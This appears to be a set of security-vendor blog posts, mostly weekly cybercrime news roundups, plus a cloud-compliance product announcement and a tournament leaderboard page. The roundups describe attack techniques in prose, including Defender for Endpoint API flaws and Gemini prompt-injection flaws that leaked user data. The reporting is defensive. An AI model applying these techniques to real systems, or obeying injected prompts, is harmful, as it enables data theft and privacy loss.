Although none of the targeted facilities suffered damage, the incidents underline inherent risks in poorly protected ICS, including programmable logic controllers (PLCs), supervisory control and data acquisition (SCADA) systems, human-machine interfaces (HMIs), and industrial IoT devices.

The Cyber Centre recommends that organizations inventory and secure internet-accessible ICS devices, remove direct internet exposure where possible, implement VPNs with multi-factor authentication (MFA), maintain regular firmware updates, and conduct regular penetration testing. Resources like the Cyber Security Readiness Goals (CRGs) can offer guidance for critical infrastructure firms and officials remind organizations that suspicious activity should be reported via My Cyber Portal or to local authorities to reduce risks of future compromise.

The Good | Europol Dismantles Global SIM-Box Fraud Network

Europol has dismantled a major cybercrime-as-a-service (CaaS) operation, codenamed SIMCARTEL, that powered over 3,200 fraud cases and caused at least €4.5 million in damages. The network operated 1,200 SIM-box devices containing some 40,000 SIM cards, enabling criminals to rent phone numbers registered to individuals in more than 80 countries. These were then used to create 49 million fraudulent online accounts for crimes including phishing, investment fraud, extortion, impersonation, and migrant smuggling.

The illegal service, run through gogetsms.com and apisim.com, worked by selling access to “fast and secure temporary” phone numbers marketed for anonymous communication and account verification. GoGetSMS also offered users a way to monetize their own SIM cards. However, reviews suggested it was a front for large-scale identity fraud, now exposed as one of Europe’s most extensive SIM-box schemes to date. Europol said the infrastructure was “technically highly sophisticated”, which allowed perpetrators worldwide to hide their identities while conducting telecom-based fraud.

After running coordinated raids across Austria, Estonia, Finland, and Latvia, police arrested seven suspects in total. They also seized five servers, the two websites, hundreds of thousands of SIM cards, €431,000 deposited in bank accounts, €266,000 in crypto, and four luxury vehicles. Both domains have been taken down and now display official law enforcement banners.

So far, authorities have linked the network to 1,700 fraud cases in Austria and 1,500 in Latvia, with combined losses adding up to nearly €5 million. Europol’s forensic analysis of the seized servers aims to identify customers of the illegal service.

The Bad | Jingle Thief Exploits Cloud Identities for Large-Scale Gift Card Fraud

A new report from security researchers details the activities of ‘Jingle Thief’, a financially motivated threat group that operates almost entirely in cloud environments to conduct large-scale gift card fraud. Active since at least 2021, the group targets retail and consumer services organizations through phishing and smishing campaigns designed to steal Microsoft 365 credentials.

Once inside, the attackers exploit cloud-based infrastructure to impersonate legitimate users, gain unauthorized access to sensitive data, and manipulate gift card issuance systems. With their campaigns focusing on mapping cloud networks, attackers can move laterally across accounts and avoid detection through stealthy tactics such as creating inbox rules, forwarding emails, and registering rogue authenticator apps to bypass MFA in M365.

Unlike traditional malware-driven attacks, Jingle Thief relies heavily on identity misuse, choosing to leverage stolen credentials instead of deploying custom payloads to blend in with normal user activity. This approach allows them to maintain access for many months while issuing or selling unauthorized gift cards for profit on gray markets.

Researchers also observed a major wave of Jingle Thief activity between April and May 2025, during which the group compromised more than 60 user accounts within a single organization. The attackers conducted extensive reconnaissance in SharePoint and OneDrive, searching for financial workflows, IT documentation, and virtual machine configurations, all tied to gift card systems.

Exploiting cloud identities rather than endpoints furthers the trend of cloud-based cybercrime, where phished credentials and identity abuse enable financially motivated actors to scale operations while remaining under the radar. Jungle Thief’s campaign is a reminder to prioritize identity-based monitoring and cloud-native security measures that provide full visibility and real-time detection.

The Ugly | PhantomCaptcha Spearphishing Targets Ukraine’s Relief Networks

SentinelLABS, together with the Digital Security Lab of Ukraine, have uncovered ‘PhantomCaptcha’, a single-day spearphishing campaign that targeted Ukrainian regional government administrations and humanitarian organizations such as the International Red Cross, UNICEF, the Norwegian Refugee Council, and other NGOs linked to war relief efforts.

Launched on October 8, 2025, the operation began with an impersonation of the Ukrainian President’s Office, distributing weaponized PDF attachments that redirected victims to a fake Zoom site (zoomconference[.]app). There, a fake Cloudflare CAPTCHA lured users into copying and pasting malicious PowerShell commands – a ClickFix technique designed to bypass traditional endpoint controls by tricking victims into executing the malware themselves.

Once running, the script deployed a multi-stage PowerShell payload leading to a WebSocket remote access trojan (RAT) hosted on Russian-owned infrastructure. The RAT enables arbitrary command execution, data exfiltration, and the potential deployment of further malware through encrypted WebSocket communications. Although investigations show that the attackers spent six months preparing the campaign, it remained active for only 24 hours, pointing to an infrastructure that demonstrates sophisticated operational security and planning.

SentinelLABS linked the campaign to an additional Android-based espionage effort hosted on princess-mens[.]click, which distributes spyware-laden APKs disguised as adult entertainment or cloud storage apps designed to harvest contacts, media files, and geolocation data.

While attribution remains unconfirmed, technical overlaps, including the ClickFix lure and Russian-hosted C2s, suggest possible ties to COLDRIVER (aka UNC4057 or Star Blizzard), a threat group linked to Russia’s Federal Security Service (FSB). PhantomCaptcha is an example of a highly organized and adaptive adversary, able to blend social engineering, short-lived but highly compartmentalized infrastructure, and cross-platform espionage to target Ukraine’s humanitarian and government sectors.

The Good | DOJ Seizes $15B in Crypto, Targets Global Scam Ring & PowerSchool Hacker

The U.S. Department of Justice has seized $15 billion in bitcoin from the Prince Group, a vast criminal syndicate behind cryptocurrency scams known as romance baiting. Led by fugitive Chen Zhi (aka Vincent), the group defrauded billions from victims through fake investment schemes disguised as romantic or business opportunities. Operating across 30+ countries, Prince Group forced trafficked workers into Cambodian compounds to run these scams under threat of violence.

The organization laundered illicit gains through complex crypto transfers before converting them into cash for luxury assets, including yachts, jets, and even a Picasso painting. In coordination with the U.K., the U.S. Treasury has sanctioned Zhi and 146 of his associates. Authorities, on the whole, estimate that Americans lost $16.6 billion to such scams last year, with Southeast Asian-based operations driving most of this increase. As global authorities intensify crackdowns on large-scale fraud and cybercrime operations, U.S. law enforcement continues to pursue domestic offenders exploiting digital platforms for profit.

Matthew D. Lane, a 19-year-old from Massachusetts, was sentenced to four years in prison and ordered to pay $14 million in restitution for orchestrating a severe cyberattack on PowerSchool, a leading K–12 software provider serving over 60 million students worldwide. Lane and his accomplices used stolen subcontractor credentials to breach PowerSchool’s systems, stealing data on 9.5 million teachers and 62.4 million students, including social security numbers and medical records. They demanded $2.85 million in Bitcoin under the alias “Shiny Hunters”.

Despite PowerSchool paying an undisclosed ransom to prevent a data leak, the group continued additional extortion attempts on several affected school districts. Lane pleaded guilty to multiple federal cybercrime charges in May.

The Bad | North Korean Hackers Deploy EtherHiding to Steal Cryptocurrency

North Korean state-sponsored hackers have begun using a novel malware-hosting method called “EtherHiding” to steal cryptocurrency, marking the first time a nation-state actor has employed this blockchain-based technique. Researchers attribute the activity to the DPRK-linked cluster UNC5342, which has been deploying EtherHiding since February 2025 as part of its ongoing “Contagious Interview” campaign. The group uses fake job offers to lure software developers, posing as recruiters from fake companies. During technical assessments, victims are tricked into running malicious code, initiating the multi-stage infection chains.

EtherHiding embeds malicious payloads within smart contracts on public blockchains, including Ethereum and Binance Smart Chain, allowing attackers to fetch the malware via read-only calls that leave no trace of the transaction. This method provides anonymity, is resilient to takedowns, and provides the flexibility to update payloads at minimal cost, an average of $1.37 USD per update. The payloads include JADESNOW, a JavaScript downloader, and InvisibleFerret, a backdoor for credential theft, remote control, and exfiltration of cryptocurrency wallet data and browser-stored passwords.

Researchers note that the threat actor’s use of multiple blockchains suggests operational compartmentalization and makes forensic analysis more difficult. The approach demonstrates a shift toward bulletproof hosting, using blockchain technology to create takedown-resistant, flexible malware distribution.

Users should exercise caution with job-related downloads and adopt best practices such as testing files in isolated environments, restricting executable file types, and enforcing strict browser policies to block script auto-execution.

The Ugly | Flaws in Microsoft Defender Could Lead to Theft of Data

Researchers have reported unpatched vulnerabilities in Microsoft Defender for Endpoint (DFE) that could enable attackers to bypass authentication, spoof data, exfiltrate sensitive information, and inject malicious files into forensic evidence collections used by security analysts.

Reported to Microsoft’s Security Response Center in July 2025, the issues were categorized as low severity, with no confirmed fixes as of this writing. Researchers tracking the flaws focused on how the agent communicated with cloud backends, using tools like Burp Suite and WinDbg memory patches to bypass certificate pinning in MsSense.exe and SenseIR.exe, allowing plaintext interception of HTTPS traffic, including Azure Blob uploads.

The core problem lies in DFE requests to endpoints such as /edr/commands/cnc and /senseir/v1/actions/, where Authorization tokens and headers are ignored. Low-privileged users can obtain machine and tenant IDs from the registry to impersonate the agent, intercept commands, or spoof responses such as faking an “already isolated” status while leaving devices exposed. Similarly, CloudLR tokens for Live Response and Automated Investigations are ignored, allowing payload manipulation and uploads to Azure Blob URIs.

In addition, attackers can access 8MB configuration dumps without credentials, revealing detection logic like RegistryMonitoringConfiguration and ASR rules, while investigation packages on disk can be tampered with, embedding malicious files disguised as legitimate artifacts.

Despite responsible disclosure by the researchers concerned, it remains unknown whether Microsoft will patch the flaws any time soon.

Regulatory compliance has never been more critical, or more complex, for organizations operating in a cloud-first world. As companies increasingly adopt and reap the benefits of the cloud, the challenge evolves from meeting established industry compliance requirements to keeping pace with ever-changing regulations and unique internal standards for each company.

Many CISOs are finding that standardized frameworks and benchmarks like NIST, HIPAA, GDPR, and more do not always adequately reflect their organization’s specific risk profile or business needs. Organizations need to define their own unique standards and requirements their cloud environments must adhere to, ensuring enhanced security and competitiveness in the market.

This blog breaks down why tailored compliance is a critical need for CISOs and how new custom compliance capabilities in SentinelOne’s Singularity Cloud Security address the full spectrum of compliance needs security leaders face.

Compliance and Customization: Where One-Size-Fits-All Falls Short

With cloud innovation spurring a great migration from on-prem environments to the cloud, it’s obvious that regulators as well as operators must follow some standard best practices, or compliance frameworks. However, despite the universal expectation for rigorous compliance, the path to achieving airtight compliance is anything but standard because each organization has its own unique set of technical, operational, and regulatory considerations.

SentinelOne is proud to announce new custom compliance capabilities Singularity Cloud Security to help address this challenge. Custom compliance gives organizations the ability to define their own security and compliance controls and enforce those controls across their entire cloud environment.

Whether you’re an organization solving for internally defined requirements that out-of-the-box tools can’t address, a global enterprise that must ensure compliance across overlapping regulatory frameworks, or a business with client-specific obligations, this new capability delivers automated, unified, and continuously monitored compliance workflows, now tailored precisely to your operational needs and regulatory obligations.

To bring this to life, several real-world scenarios where custom compliance controls prove especially beneficial include the following:

• Organizations operating in multiple geographies or industries like SaaS providers or payment processors navigating a complex mix of industry, regional, and contractual regulations, can seamlessly layer and integrate multiple frameworks, mapping controls, assigning ownership by business unit or geography, and monitoring adherence through a unified dashboard.
• Healthcare systems often have unique, internally defined requirements including the need for bespoke access tracking or advanced activity logging beyond HIPAA mandates. Healthcare providers can create unique controls within the platform, eliminating the need for manual workarounds and ensuring that even the most specialized requirements are continuously monitored and auditable.
• Financial services firms can automate compliance evidence collection and tailor monitoring to their specific risk models or proprietary business logic, reducing redundant or unnecessary requirements and making it easier to demonstrate compliance with the exact combination of regulations that apply to each part of their organization.

Custom Compliance in Action

Ease of use is paramount for any compliance capability, especially for creating your own unique custom controls. CISOs and security leaders can define complex compliance controls specific to their own organization with literally a few clicks.

To start defining a custom compliance framework, users can navigate to the compliance dashboard within the Singularity SOC and click on “Create framework”.

Any new framework is structured to have a hierarchy of controls, sub-controls, and rules. Once a new framework has been named and a description added for future users, there are two ways of populating the framework with compliance rules. Users can either pick specific rules/sub-controls/controls from more than 45 existing compliance frameworks like HIPAA, CIS, NIST, and others, or they can create their own custom controls, sub-controls, and add rules.

This enables organizations to assemble truly bespoke compliance frameworks by seamlessly blending controls from multiple standards with their own specialized rules, giving them unparalleled flexibility to address unique regulatory and business needs.

Users can also schedule compliance reports directly from the Reports page, making it easy to set up recurring, detailed reports. Gain timely insights into your cloud security posture, simplify audit readiness, and continuously monitor and strengthen compliance—no manual effort required.

The ability to deploy custom compliance controls with the same ease as standard frameworks greatly simplifies ongoing compliance for organizations. This proactive stance both satisfies auditors and regulators and empowers the business to move faster, innovate securely, and maintain trust with stakeholders.

Custom Compliance, Real Confidence

Custom compliance gives organizations greater flexibility and control over their security and compliance programs. This isn’t just technical capability—it’s a strategic shift. Instead of relying solely on preset industry frameworks, teams can establish requirements that directly reflect their business goals, unique risks, and internal obligations, all while eliminating manual processes and streamlining monitoring and reporting. Singularity Cloud Security stands out as the only cloud security solution that empowers organizations to transform compliance from an obstacle into a driver of clarity, trust, and business acceleration.

Learn More

• Check out the Singularity Cloud Security product tour
• Learn more about SentinelOne’s CNAPP solution
• Read the 2025 Cloud Security Survey Report
• Get a 30 minute demo from a SentinelOne expert

The Good | Teens Arrested in Nursery Doxing Case as OpenAI Disrupts Cybercrime Clusters

U.K. police have arrested two 17-year-olds in Hertfordshire for allegedly doxing children following a ransomware attack on London-based Kido nurseries. The Radiant Group claimed responsibility, saying they stole sensitive data and photos of over 8000 children and leaked some online to extort Kido. Later, the files were removed after the groups’ threats to both Kido and parents of the affected children failed to make headway. Kido, supporting over 15,000 families in the U.K, U.S, China, and India, confirmed the breached data was hosted by Famly, a nursery software platform, which said its systems were not compromised.

The UK’s NCSC called the attack on children “particularly egregious” and the Met Police emphasized their commitment to bringing the perpetrators to justice. The arrests reflect a wider trend of teenagers involved in major U.K. cyberattacks, with recent cases linked to Marks & Spencer, Co-op, Harrods, and Transport for London.

Also this week, OpenAI said it disrupted three malicious activity clusters abusing ChatGPT for cybercrime and influence operations. The first involved Russian-speaking actors using multiple accounts to develop components of remote access trojans (RATs), credential stealers, and data exfiltration tools. The second, tied to North Korean actors, used ChatGPT to assist in malware, phishing, and C2 development – using the chatbot to draft copy, perform experiments, and explore new techniques. The third was linked to Chinese threat group ‘UNK_DropPitch’, which leveraged the tool to create multilingual phishing content and automate hacking tasks.

Beyond these, OpenAI also blocked networks from Cambodia, Myanmar, Nigeria, Russia, and China for using AI in scams, propaganda, and surveillance, though all mentioned actors tried to mask signs of their abuse of the tool to further their operations.

The Bad | Crimson Collective Group Breach Cloud Systems to Steal Data & Extort Victims

A threat group called ‘Crimson Collective’ has launched a series of targeted attacks on AWS cloud environments, stealing sensitive data and extorting victims through multi-stage intrusions. The group just recently exfiltrated 570 GB of data from thousands of private GitLab repositories before joining forces with Scattered Lapsus$ Hunters to intensify its extortion efforts.

Researchers explain how Crimson Collective’s operations begin with harvesting exposed long-term access credentials using open-source tools like TruffleHog. Once inside, they create new privileged accounts and escalate privileges by assigning administrative policies, effectively gaining complete control over the compromised environment. Here, the attackers enumerate users, databases, and storage systems in preparation of large-scale data theft.

The group’s exfiltration process involves modifying database master passwords, creating snapshots of databases before exporting them to S3 for transfer through API calls. EBS (Elastic Block Store) volumes are then launched and attached under permissive security groups to move data more freely. Victims typically receive ransom demands via in-platform email systems and external addresses once exfiltration is complete.

Investigations found that the group employs many IP addresses, some reused across different incidents, which allowed partial tracking of its operations. While Crimson Collective’s size and infrastructure remain unclear, its extortion tactics indicate an expanding threat to organizations relying on cloud-based infrastructure. Using short-term, least-privileged credentials and enforcing IAM policies can help mitigate the chance of breaches.

Researchers warn that leaked credentials and lax privilege management continue to be major enablers for these attacks, and urge companies to tighten access controls, limit credential lifespan, and regularly audit for exposed secrets using open-source scanning tools.

The Ugly | Attackers Breach Discord Ticketing Support, Exposing Data of 5.5M Users

Threat actors claiming to have breached Discord’s customer support systems are now threatening to leak data allegedly stolen from millions of users after the company refused to pay ransom demands. This latest threat follows reports that the attackers first gained access to a third-party support provider in late September, exfiltrating sensitive user information such as names, emails, government IDs, and partial payment details.

Discord confirmed that the compromise affected a vendor system used for customer service, not its internal infrastructure, and said around 70,000 users had their government ID photos exposed – far fewer than the 2.1 million claimed by the attackers. The company stressed that inflated figures and ransom demands were part of an extortion campaign and that it will not reward illegal actions.

According to the threat actors, they accessed Discord’s support platform for 58 hours through a compromised account belonging to an outsourced support agent. During this window, the scope of their claim includes 1.6 terabytes of data, including 8.4 million support tickets affecting 5.5 million users, with roughly 580,000 containing partial payment information. The attackers also said integrations between the support system and Discord’s internal database allowed them to run millions of API queries for additional user data.

The actors initially demanded $5 million, later reducing it to $3.5 million before Discord ended negotiations and went public with the breach. The group has since threatened to release the stolen data, marking one of the largest extortion-driven data thefts to hit a major communication platform in 2025.

The Good | UK Convicts “Bitcoin Queen” in World’s Largest Cryptocurrency Seizure

This week, a court in the UK convicted Bitcoin fraudster Qian Zhimin (aka Zhang Yadi) of acquiring and possessing criminal property after a 7 year pursuit and the recovery of stolen crypto assets now worth $7.3 billion.

Qian, a 47 year old Chinese national, had profited from a multibillion dollar fraud scheme between 2014 and 2017, in which she convinced around 130,000 unwitting victims to invest in “digital gold” by promising returns of 100-300%.

Dubbed “the Bitcoin Queen”, Qian fled from China to the UK using a false passport after authorities began investigating her in 2017. She then attempted to launder her funds through an accomplice, Wen Jian, a 42 year old female who facilitated the purchase of property, jewellery and other high value assets on Qian’s behalf.

In 2018, authorities seized a number of digital devices from Qian and Wen’s London home, but it was not until 2021 that they realized the devices contained digital wallets holding 61,000 Bitcoin, worth at that time around a billion dollars. Wen was subsequently arrested in 2022 and convicted in 2024. Qian remained at large until her arrest in April 2024. Qian’s sentencing has been set for next month.

What happens to the seized funds remains the subject of some controversy since the value of the Bitcoin now far exceeds that of the funds invested by victims. Both the UK government and representatives of the Chinese victims are seeking restitution.

The Bad | Hackers Exploit Milesight Routers to Send Phishing SMS to Users

New research suggests that multiple threat actors may be leveraging an unpatched bug in Milesight cellular routers, targeting users in a number of different countries with SMS phishing messages (aka Smishing) since at least 2022. A patch for the flaw, CVE-2023-43261, was released in 2023, but analysis suggests many unpatched devices remain accessible from the public internet.

The researchers say that attackers have been exploiting the vulnerable routers to send large volumes of SMS messages mimicking government services, banks and delivery companies. Victims receive legitimate looking texts urging them to click malicious links, which redirect to mobile-optimized phishing pages.

The attack is made possible as the flaw allows anyone to access log messages on the exposed routers via API calls. The logs contain encrypted administrator credentials which attackers can decrypt using hardcoded AES keys found in the client-side JavaScript and then use these credentials to authenticate further API calls.

The researchers also believe other bugs may be in play as they noted evidence that many exposed devices were running outdated firmware with other known vulnerabilities.

Analysis of the targeted phone numbers indicates that Europe is the primary region affected by the smishing campaigns, with Belgium heavily targeted; however, vulnerable devices were also observed in Australia, Turkey, Singapore and even North America. In one of a number of campaigns, SMS lures using the domain disney[.]plus-billing[.]sbs and referencing a payment issue urged recipients to click a malicious link.

Phishing messages in several languages, including French, Italian and English, were observed. The researchers believe multiple campaigns have been in operation by different threat actor groups targeting the same vulnerable infrastructure.

Vulnerable cellular routers offer an attractive target to threat actors, affording them the ability to send messages at scale without being flagged as malicious. Individuals and businesses are reminded that, as with other forms of phishing, heightened awareness and scepticism towards unsolicited SMS messages, even when they appear to come from trusted sources, is a vital first line of defense.

The Ugly | Trio of Flaws in Google Gemini Turn AI Into Attack Vehicle

AI is in the spotlight again this week with news that several products within Google’s family of AI models were vulnerable to search injection attacks, prompt injection attacks and exfiltration of user data, leading researchers to dub the flaws the ‘Gemini Trifecta’.

The flaws were found in Google Cloud Platform’s Gemini Cloud Assist, Gemini Search Personalization, and Gemini Browsing Tool, and serve as a reminder of the risks that AI brings to enteprises as threat actors look to manipulate such tools in their attacks. The researchers say they discovered three distinct components in the Gemini suite that had issues:

• Gemini Cloud Assist — This prompt-injection vulnerability in Google Cloud’s Gemini Cloud Assist tool could have enabled attackers to exploit cloud-based services, potentially compromising cloud resources, and also could have allowed phishing attempts. This vulnerability represents a new attack class in the cloud and in general, where log injections can poison AI inputs with arbitrary prompt injections
• Gemini Search Personalization Model — This search-injection vulnerability gave attackers the ability to inject prompts, control Gemini’s behavior and potentially leak the user’s saved information and location data by manipulating their Chrome search history
• Gemini Browsing Tool — This flaw allowed attackers to exfiltrate a user’s saved information and location data by abusing the browsing tool, potentially putting user privacy at risk.

The vulnerabilities were reported to Google and have now been patched. However, it is important that enterprises view AI assistants not just as passive productivity tools but as active attack surfaces and treat them accordingly.

The Good | Law Enforcement Makes Swift Arrest After Attack on Airports

Authorities in the UK have been quick to arrest an individual in connection with the cyber attack on Collins Aerospace last Friday, which caused disruption at several European airports including Berlin, Brussels, Dublin, and Heathrow.

The attack on Collins’ MUSE (Multi User System Environment) software – responsible for processing activities like passenger check-in, boarding and bag drops – disrupted flight across the weekend, with carriers at Brussels airport being told to cancel some 140 of 276 scheduled flights for the following Monday.

Meanwhile, Heathrow is said to have had more than a thousand computers “corrupted”, indicating a likely ransomware attack.

In Berlin, airport authorities said that as of Wednesday morning check-in and boarding were still being handled manually and that passengers should expect delays and cancellations.

A spokesperson for Dublin airport said manual workarounds for check-in and bag drops were still in place as of Wednesday and there was as yet no timeline for when things would return to normal.

An unidentified male in his 40s was arrested in West Sussex, UK on Tuesday evening on suspicion of Computer Misuse Act offences. The UK’s National Crime Agency (NCA) says the investigation remains at an early stage and is ongoing. The man has been released on bail pending further enquiries.

The Bad | DPRK Threat Actor Groups Collaborate to Weaponize Developer Identities

Researchers at ESET have this week offered further evidence that distinct DPRK threat actor groups responsible for the Contagious Interview campaign and the DPRK Fraudulent IT Worker campaign are likely working in concert, using identities stolen from the former to feed the recruitment drive of the latter.

Detailing the activities of a threat actor they call DeceptiveDevelopment, broadly overlapping those of Contagious Interview, the researchers say they uncovered new links between the two campaigns. DeceptiveDevelopment operators use LinkedIn and other social media platforms to pose as recruiters, using fraudulent job offers to lure job seekers and compromise their computers.

Meanwhile, operators running IT worker scams use the information stolen by DeceptiveDevelopment operators to pose as job seekers with companies they wish to infiltrate. The researchers say the fake IT workers initially targeted jobs in the U.S. but have now shifted to European countries such as France, Poland, and Ukraine.

While DeceptiveDevelopment focuses on malware, OSINT shows ties to North Korean IT workers who use fake identities to secure remote jobs, thus surreptitiously funding North Korean state operations. 5/6

— ESET Research (@esetresearch.bsky.social) 25 September 2025 at 10:24

Through an analysis of OSINT data and other research, ESET says the fake IT workers are organized into teams with members working between 10-16 hours per day, pursuing job opportunities, completing tasks and undertaking studies in topics such as web programming, blockchain, AI and English language. The members also use prepared scripts to try and recruit proxies in target countries who would be willing to attend interviews or run laptop farms.

The scale of the DPRK’s activities to infect job seekers and their potential or current employers as well as to use stolen data to infiltrate companies as fraudulent workers has surprised security researchers. The threat presents a different challenge to simply detecting and preventing isolated campaigns and underscores the need for security teams and recruitment teams to develop workflows that can identify fraudulent applications. At the same time, enterprises are urged to ensure they lockdown their internal resources with a trusted security platform that can prevent both intrusions and insider threats.

The Ugly | China-Linked Threat Actor Drops Malware on Edge Devices That Sleeps for Over a Year

China-linked threat actors have been targeting U.S. firms in the tech and legal sectors with a stealthy backdoor known as BRICKSTORM, likely with the aim of infecting a broader range of downstream victims and feeding development of new zero days, Google’s Threat Intelligence Group (GTIG) has said this week.

Attributing the activity to UNC5221, GTIG said the threat cluster was distinct from the widely-reported activities of Silk Typhoon, named as responsible for a number of attacks on U.S. interests earlier this year. UNC5221’s activities are specifically focused on obtaining and maintaining long-term access via backdoors on appliances and network edge devices that typically cannot support endpoint security software due to limited processor power, memory and storage space.

The researchers said initial access was difficult to determine due to the lengthy dwell time between infection and attack, on average 393 days, which often exceeded log retention periods. However, in one case, it was determined that the intrusion leveraged a security flaw in Ivanti Connect Secure devices to obtain initial access.

Having gained a foothold, UNC5221 deploy a Linux/BSD malware known as BRICKSTORM, a Go-based backdoor, to a network appliance before pivoting to VMware vCenter and ESXi hosts, using valid credentials captured from the network appliance.

GTIG said a common theme across incidents was the threat actor’s interest in emails of key individuals within the victim organization, in particular those of developers and system administrators. The attackers used Microsoft’s Entra ID Enterprise Applications with mail.read and full_access_as_app scopes to gain access to every mailbox.

Hunting for BRICKSTORM creates challenges for defenders as the malware typically resides on devices that lack EDR telemetry. Google has released a scanner tool to help search for known samples, along with comprehensive advice for threat hunting and hardening of devices.

The Good | Federal Courts Crack Down on BreachForums & UNC3944 Cybercrime Operators

Conor Brian Fitzpatrick, the 22-year-old operator of the notorious BreachForums hacking site, has been resentenced to three years in prison after a federal appeals court overturned his earlier punishment of time served and supervised release. Known online as “Pompompurin”, Fitzpatrick launched BreachForums in 2022 after the FBI dismantled RaidForums, quickly attracting more than 330,000 members.

The site was a major hub for trading data stolen from telecom providers, healthcare companies, social networks, investment firms, and U.S. government agencies. Fitzpatrick was first arrested in March 2023 and pleaded guilty to being the site’s administrator. Prosecutors sought more than 15 years due to his violations of pretrial conditions, which included secretly using VPNs and unmonitored devices, but the court ultimately imposed a three-year prison term.

Meanwhile, U.K. authorities have advanced their fight against hacking collectives. Two teenagers, 18-year-old Owen Flowers of Walsall and 19-year-old Thalha Jubair of East London, were arrested in connection with the August 2024 cyberattack on Transport for London (TfL). Both are believed to be members of the UNC3944 collective, known most recently for targeting large organizations across multiple verticals.

Flowers faces additional charges for conspiring to breach U.S. healthcare providers, while Jubair has been charged in the U.S. with computer fraud, wire fraud, and money laundering tied to more than 120 global breaches that netted $115 million in ransom. The TfL attack disrupted internal operations, delayed refunds, and exposed customer data including names, addresses, and contact details. Previous arrests in July linked UNC3944 to cyberattacks on major UK retailers such as Harrods and Marks & Spencer.

The Bad | China-Linked TA415 Uses U.S.-China Trade Lures in Targeted Espionage Campaigns

A Chinese state-sponsored threat actor known as TA415 has been linked to a string of spearphishing attacks against U.S. government entities, think tanks, and academic institutions in July and August. The campaign tailored its lures by using U.S.-China economic and trade topics, even impersonating the U.S.-China Business Council and the Chair of the House Select Committee on Strategic Competition to target individuals focused on relations and policy between the two nations.

Emails appeared to invite recipients to closed-door briefings and were sent from uschina@zohomail[.]com, with links to archives hosted on Zoho WorkDrive, Dropbox, and OpenDrive. These archives contained a decoy PDF and a Windows shortcut (LNK) file, which executed a batch script that deployed WhirlCoil, an obfuscated Python loader. The malware was able to establish persistence via scheduled tasks and open Visual Studio Code Remote Tunnels to grant attackers backdoor access and enable arbitrary command execution.

The collected data, including system information and user files, was exfiltrated through request logging services in base64-encoded HTTP POST requests. While early variants downloaded WhirlCoil components from Pastebin and Python.org, the infection chain has remained largely consistent since its first noted use in 2024 against aerospace, insurance, and manufacturing firms.

The continued abuse of Visual Studio Code Remote Tunnels highlights the challenge for defenders: since the feature is legitimate, it blends into normal developer workflows, and is hard to detect without specific monitoring. Analysts note that TA415, which overlaps with APT41, has gradually refined this technique over the past year, ramping up activity in recent months as U.S.-China trade negotiations intensify.

The Ugly | Chaos Mesh Vulnerabilities Put Kubernetes at Risk of Full Cluster Takeovers

Researchers have revealed multiple critical flaws in Chaos Mesh, an open-source Chaos Engineering platform for Kubernetes designed to simulate, test, and identify potential weak spots in pods, networks, and other components. If exploited, the four vulnerabilities, collectively named Chaotic Deputy, could allow attackers to take over entire clusters.

The report warned that attackers need only minimal in-cluster network access to exploit the vulnerabilities, enabling them to run fault injections, shut down pods, disrupt communications, and even steal privileged tokens for further attacks.

CVE-2025-59358 (CVSS 7.5) exposes an unauthenticated GraphQL debugging server that lets attackers kill arbitrary processes in any Kubernetes pod, which could lead to cluster-wide denial-of-service. CVE-2025-59359, CVE-2025-59360, CVE-2025-59361 (all, categorized as CVSS 9.8) are command injection flaws in the Chaos Controller Manager’s GraphQL mutations (cleanTcs, killProcesses, and cleanIptables, respectively) that allow remote code execution (RCE).

Chaotic Deputy stems from insufficient authentication in the Chaos Controller Manager’s GraphQL server. An in-cluster attacker with initial access to a network could chain the four vulnerabilities to execute arbitrary commands on the Chaos Daemon, achieving full cluster compromise. The result could mean data theft, service disruption, and lateral movement across Kubernetes environments.

The flaws were responsibly disclosed in early May and patched in Chaos Mesh version 2.7.3, released August 21. Users are strongly urged to upgrade immediately, and if patching isn’t possible, mitigations include restricting network traffic to the Chaos Mesh daemon and API server as well as avoiding deployments in open or weakly secured environments.

Researchers stressed that while Chaos Engineering platforms offer the ability to test resilience, their deep cluster access and flexibility makes them a high-value target and vulnerabilities like Chaotic Deputy can be especially risky if left unpatched.

The Sentinels League is the official, week-by-week standings for the Threat Hunting World Championship – the first-of-its-kind tournament where the world’s top defenders go head-to-head across four surfaces: AI, Cloud, SIEM, and Endpoint. Thousands of blue teamers from more than 100 countries are tackling real-world attack scenarios to earn points, climb the tables, and secure their path to Las Vegas.

Bookmark this blog post to check your position, track the movement each week, and jump into the next qualifier if you’re not on the board yet.

More Than a Game | How the Sentinels League Work

Qualifiers run throughout the month of September across the four league tracks with players who finish in the top 50 in each league advancing to the Regional Finals on October 22 for the Americas, Europe, and Asia Pacific & Japan. From there, regional champions progress to the Grand Final at OneCon in Las Vegas from November 4 to 6, where the World Champion is crowned.

This is more than a game. It’s a global showdown that blends entertainment, education, and elite competition. Defenders everywhere will up-level their skills and battle for:

• $100,000 in prizes
• A championship trophy
• The prestige of being crowned World Champion
• Charitable donations made in partnership with the S Foundation on behalf of each finalist

Only one player will take home the title, but everyone gains the experience of battling in real-world scenarios that sharpen the skills cyber defenders use daily.

A Global Leaderboard in Action | Follow the League Tables Live

These games are grounded in real incidents and operational trade-offs. Players earn points for flags captured and accuracy under time limits. This means pace and precision both matter. The tables below display each player’s alias, alongside points, and the prize they would receive should they finish in that same position.

Qualifying Stages

Compete online from anywhere, or in-person at select events this month. Earn Threat Hunting Hero badges, prizes, and points that advance you up the league tables. Throughout September, players may enter once per qualifier and compete across all four tracks.

• AI Qualifier Games: Take on scenarios featuring AI attackers and AI-powered threat hunting tools.
• Cloud Qualifier Games: Track and neutralize threats across cloud-based attack surfaces.
• SIEM Qualifier Games: Assert your dominance in real-time SIEM hunting and remediation challenges.
• Endpoint Qualifier Games: Hunt down and remediate endpoint vulnerabilities in scenarios pulled straight from real-world incidents.

Regional Finals | October 22

The top 200 players from each region (Americas, Europe, Asia Pacific & Japan) will face off live in an action-packed online event. Only three regional champions will advance.

Grand Final | November 4–6 | OneCon, Las Vegas

Three finalists will earn an all-expenses-paid trip to OneCon 2025 in Las Vegas to compete live on stage for the World Championship title, the trophy, and the $100K prize pool.

Leagues Menu Quick Jump

• AI League
• Cloud League
• SIEM League
• Endpoint League

AI Leagues

Live table for the AI League Qualifiers are as follows. Top 50 on October 2 qualify for the Regional Finals.

AI APJ League

AI EMEA League

AI AMERICAS League

Back to the Menu Quick Jump

Cloud Leagues

Live table for the Cloud League Qualifiers are as follows. Top 50 on October 2 qualify for the Regional Finals.

Cloud APJ League

Cloud EMEA League

Cloud AMERICAS League

Back to the Menu Quick Jump

SIEM Leagues

Live table for the SIEM League Qualifiers are as follows. Top 50 on October 2 qualify for the Regional Finals.

SIEM APJ League

SIEM AMERICAS League

